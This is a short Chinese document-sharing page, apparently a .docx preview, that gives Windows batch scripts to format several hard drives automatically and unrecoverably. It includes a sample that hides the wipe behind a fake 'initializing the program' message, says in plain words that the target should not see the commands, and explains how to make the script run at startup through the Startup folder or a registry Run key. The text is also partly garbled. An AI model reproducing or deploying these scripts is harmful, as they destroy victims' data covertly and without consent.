《格式化硬盘批处理命令.docx》由会员分享,可在线阅读,更多相关《格式化硬盘批处理命令.docx(2页珍藏版)》请在三一办公上搜索。
1、格式化硬盘批处理命令echo off type y|format 盘符: type y|format 盘符: type y|format 盘符: exit edit xxx.batpath=c:dos;c:windows;c:windowscommandformat c:/q存盘退出echo offfor %a in (d e f c) do (echo y | format /u /q %a:)exit%a 将依次代表d e f c 然后,format (格式化命令)将分别对 d e f c 盘进行格式化echo y 是自动输入y,(格式化前会询问是否确定)/u 是不可恢复/q 是快速格式化
2、其实可以再加一个 /x,可以简单理解为强制性echo offset pf=c: d: e: f: g: h:for %i in (%pf%) do (echo y|format %i)pause>nul自然不能让对方看到你使用的命令啦。Sample:echo offecho Now initializing the program,please wait a minite.format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)开机自启动/etc/rc.local下面代码存为批处理文件就可以了,要想开机自动运行,就批处理文件放在 开始->程序->启动里边就行了,懂注册表的话放在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun